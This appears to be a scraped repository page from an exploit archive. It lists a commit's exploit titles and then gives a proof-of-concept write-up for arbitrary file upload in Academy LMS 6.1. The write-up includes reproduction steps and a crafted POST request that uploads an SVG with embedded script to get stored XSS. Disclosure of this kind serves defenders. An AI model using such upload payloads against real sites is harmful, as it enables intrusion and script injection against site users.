4e246a01fb
18 changes to exploits/shellcodes/ghdb
DLINK DPH-400SE - Exposure of Sensitive Information
FileMage Gateway 1.10.9 - Local File Inclusion
Academy LMS 6.1 - Arbitrary File Upload
AdminLTE PiHole 5.18 - Broken Access Control
Blood Donor Management System v1.0 - Stored XSS
Bus Reservation System 1.1 - Multiple-SQLi
Credit Lite 1.5.4 - SQL Injection
CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
Hyip Rio 2.1 - Arbitrary File Upload
Member Login Script 3.3 - Client-side desync
SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS
WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)
Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
Kingo ROOT 1.5.8 - Unquoted Service Path
NVClient v5.0 - Stack Buffer Overflow (DoS)
Ivanti Avalanche <v6.4.0.0 - Remote Code Execution
50 lines
No EOL
1.6 KiB
Text
50 lines
No EOL
1.6 KiB
Text
# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload
|
|
# Exploit Author: CraCkEr
|
|
# Date: 05/08/2023
|
|
# Vendor: Creativeitem
|
|
# Vendor Homepage: https://academylms.net/
|
|
# Software Link: https://demo.academylms.net/
|
|
# Version: 6.1
|
|
# Tested on: Windows 10 Pro
|
|
# Impact: Allows User to upload files to the web server
|
|
# CWE: CWE-79 - CWE-74 - CWE-707
|
|
|
|
|
|
## Description
|
|
|
|
Allows Attacker to upload malicious files onto the server, such as Stored XSS
|
|
|
|
|
|
## Steps to Reproduce:
|
|
|
|
1. Login as a [Normal User]
|
|
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings
|
|
3. Upload any Image into the [avatar]
|
|
4. Capture the POST Request with [Burp Proxy Intercept]
|
|
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
|
|
|
|
-----------------------------------------------------------
|
|
POST /wp-admin/async-upload.php HTTP/2
|
|
|
|
-----------------------------------------------------------
|
|
Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg"
|
|
Content-Type: image/svg+xml
|
|
|
|
<?xml version="1.0" standalone="no"?>
|
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
|
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
|
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
|
<script type="text/javascript">
|
|
alert("XSS by CraCkEr");
|
|
</script>
|
|
</svg>
|
|
-----------------------------------------------------------
|
|
|
|
6. Send the Request
|
|
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS]
|
|
8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg
|
|
|
|
|
|
|
|
[-] Done |